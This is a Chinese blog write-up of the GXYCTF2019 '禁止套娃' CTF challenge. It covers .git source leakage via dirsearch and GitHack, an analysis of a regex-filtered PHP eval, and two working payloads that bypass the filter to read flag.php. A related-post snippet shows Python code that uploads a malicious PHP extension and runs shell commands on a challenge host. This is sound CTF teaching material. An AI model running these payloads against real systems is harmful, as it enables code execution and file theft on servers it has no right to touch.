[GXYCTF2019]禁止套娃(特详解)

最新推荐文章于 2024-02-05 10:47:22 发布
最新推荐文章于 2024-02-05 10:47:22 发布
阅读量2w 收藏 17
点赞数 23
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/135923338
版权
文章讲述了作者在遇到429状态码限制后,通过抓包和Dirsearch工具探测发现Git泄露,进而利用Githack下载index.php源码。内容详细解释了PHP代码中的安全检查机制,并展示了两种方法:一种是利用highlight_file函数和正则表达式绕过限制,另一种是通过session_id绕过安全检查获取flag。
摘要由CSDN通过智能技术生成

刚打开页面什么都没有,抓包也什么都没有

image-20240129230547068

那就dirsaerch扫一下,发现状态码都是429,访问太快了(这里很多师傅都没有说明或者说清楚)

image-20240129230809356

这里改了一下线程(kali自带的,如果用的脚本要加前面要加python)

dirsearch -u http://d4300875-40df-4a49-a897-d48abc13126c.node5.buuoj.cn:81/ -e php -s 1

发现.git文件,原来是git泄露

image-20240129231035791

对于git泄漏我们可以使用Githack工具 https://github.com/lijiejie

下载后,直接运行脚本

python GitHack.py http://d4300875-40df-4a49-a897-d48abc13126c.node5.buuoj.cn:81/.git    

成功下载了index.php文件

image-20240129231353500

源码

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

解释一下关键代码

  1. if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {:使用正则表达式检查 "exp" 参数中是否包含某些危险协议,如 data://、filter://、php://、phar://。如果包含,则输出错误消息。

  2. if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {:检查是否在 "exp" 参数中存在函数调用,并使用递归匹配来验证函数调用的合法性。如果合法,则执行下一步。

    '/[a-z,_]+\((?R)?\)/':这是一个正则表达式,用于匹配类似函数调用的字符串。让我们分解这个正则表达式:

    • [a-z,_]+:匹配任意长度的由小写字母、逗号和下划线组成的字符串,这部分表示函数名。

    • \(:匹配左括号 "("。

    • (?R)?:这是一个递归匹配的部分,表示匹配任何可能包含函数调用的字符串,递归地调用整个正则表达式。

    • \):匹配右括号 ")"。

    总体而言,这个正则表达式用于匹配类似于 function_name(...) 这样的字符串。一个合法的表达式也可以是a(b();)

  3. if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {:检查 "exp" 参数中是否包含某些关键词,如果包含,则输出错误消息。这是为了防止直接调用一些敏感函数或操作。

最后通过eval拿到flag,合着意思就是只能使用无参函数的嵌套来读取flag.php文件

看了其他师傅的博客有了思路,太伟大了!!

方法一

先介绍几个函数

highlight_file() 函数对文件进行语法高亮显示,本函数是show_source() 的别名
next() 输出数组中的当前元素和下一个元素的值。
array_reverse() 函数以相反的元素顺序返回数组。(主要是能返回值)
scandir() 函数返回指定目录中的文件和目录的数组。
pos() 输出数组中的当前元素的值。
localeconv() 函数返回一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."。

payload:

exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

思路:

loacleconv 函数会固定返回一个 . 然后pos将我们获得的 .返回到我们构造的 payload 使得 scandir能够返回当前目录下的数组(换句话说,就是读出当前目录下的文件) rray_reverse()以相反的顺序输出(目的是以正序输出查询出来的内容)然后 next 提取第二个元素(将.过滤出去),最后用highlight_file()给显示出来

image-20240129232053232

方法二 上面 的正则过滤中 其实并没有过滤掉 session_id() 所以我们可以通过在数据包里加入session,使用 session_id来获取 flag session_id() 可以用来获取/设置 当前会话 ID。 在我们使用 session_id()的时候 需要使用session_start()来开启session会话 我们尝试构造payload

?exp=highlight_file( session_id(session_start()));

传参然后抓包,加cookie

image-20240129233149186

小小邵同学
关注
  • 23
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
俄罗斯套
04-17
"俄罗斯套"这个标题可能是指一种殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
俄罗斯套奖品Java程序
08-12
标题中的“俄罗斯套奖品Java程序”表明这是一个使用Java编程语言实现的程序,它可能与俄罗斯套这种玩具的概念相结合,创建出一种趣味性的计算模型或者游戏。俄罗斯套通常指的是一个大里面装着小一点的同款...
[GXYCTF2019] web题-禁止
BROTHERYY的博客
07-28 714
复现环境:buuoj.cn 使用GitHack下载源码index.php 使用 print_r(scandir(current(localeconv())));查看目录 最终完整exp: ?exp=highlight_file(next(array_reverse(scandir(current(localeconv()))))); 用到的函数 print_r() scandir() localeconv() current() next() array_reverse() highlight_file
[GXYCTF2019]禁止--详解
金 帛的博客
06-12 2464
BUUCTF记录贴
BUUCTF [GXYCTF2019] 禁止
nareku的博客
06-29 1391
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
[GXYCTF2019]禁止
box
10-20 258
这题多少有点变态 首先是 git源码泄露,使用 lijiejie的 GitHack.py 获取 .git源码 python2 GitHack.py http://b83677d6-46c1-46e1-b740-8dc6102420b6.node4.buuoj.cn/.git index.php 代码分析一波 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_ma
[GXYCTF2019]禁止1 不会编程的崽的博客
最新发布
不会编程的崽的博客
02-05 1249
ctf 源码泄露 无参数rce
BUUCTF-[GXYCTF2019]禁止
yuqie的博客
04-06 256
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
精品源码 / 炫酷效 / 双层悬浮方形相册
12-16
这种效的核心在于其“套”结构,即两个正方形相框重叠布局,形成一种层次感。下面将详细探讨这个效的实现原理、技术要点以及可能的应用场景。 首先,这个效的基础是HTML结构和CSS样式控制。HTML用于构建...
别致的俄罗斯套广场.ppt
03-13
【标题】:“别致的俄罗斯套广场”实际上是指一个以俄罗斯传统工艺品——套为主题的广场,这可能是一个文化景点或者公共艺术空间。这个PPT可能是关于该广场的介绍或展示,包含了其设计色、历史背景以及与套...
俄罗斯套奖品C++程序
05-19
在IT领域,编程竞赛是一种锻炼和展示编程技巧的常见方式,而“俄罗斯套奖品C++程序”就是一个这样的例子,它曾出现在中兴通信公司的“捧月杯”编程竞赛中。这个程序的设计和实现利用了C++这门强大的编程语言,展示...
【BUUCTF】[GXYCTF2019]禁止
aoao331198的博客
04-13 825
dirsearch扫描目录发现存在git泄露 于是用GitHack 生成index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\
[GXYCTF2019]禁止-无参数rce详细分析(代码审计三)
qq_50589021的博客
06-02 290
[GXYCTF2019]禁止 做这个题的时候是不知道禁止是什么意思的,等完全理解((?R)?\)\)了这个正则匹配表达式以后就可以明白,所谓的套就是什么 考点: 无参数rce 信息泄露 利用dirsearch开延时,会扫出来.git相关的泄露,利用githack将源码down下来 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\
buuctf-[GXYCTF2019]禁止(小宇详解
小宇的web博客
02-12 1189
buuctf-[GXYCTF2019]禁止(小宇详解) 这里先看题 这里没有找到什么有用的信息,先使用dirsearch来爆破但是没有找到有用的,这时我就怀疑是有git泄露了这里使用githack探测发现了index.php 这里直接看源码吧 <?php 2 include "flag.php"; 3 echo "flag在哪里呢?<br>"; 4 if(isset($_GET['exp'])){//需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的
[GXYCTF2019]禁止 1
weixin_53150482的博客
07-12 795
[GXYCTF2019]禁止 1
[GXYCTF2019]禁止 WP
Yang_99的博客
08-06 401
1.第一步是.git文件泄露 用GitHack.py跑一下得到源码index.php 2.读源码 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]
ctfshow套shell
08-24
CTFSHOW套shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`php ext_skel.php --ext ctfshow --std`来生成该扩展的目录。 2. 进入生成的目录,并编辑.c文件,根据需要进行修改。 3. 执行以下命令来编译和安装扩展:`phpize ./configure make && make install`。编译完成后,会告知具体的扩展安装位置。 4. 通过发送POST请求,使用CTFSHOW套shell来写入并执行命令。示例代码如下: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'file': '/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so', 'content': open('ctfshow.so', 'rb').read()} requests.post(url + '?a=write', data=data) requests.get(url + '?a=run') ``` 5. 使用CTFSHOW套shell执行命令。可以使用以下命令示例: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'cmd': 'cat /f*'} requests.post(url + '?a=shell', data=data) ``` 这样,您就可以使用CTFSHOW套shell来执行命令并获取所需的结果了。请注意,使用套shell存在安全风险,应仅在合法和授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFSHOW 常用姿势篇(811-820)](https://blog.csdn.net/miuzzx/article/details/124038567)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值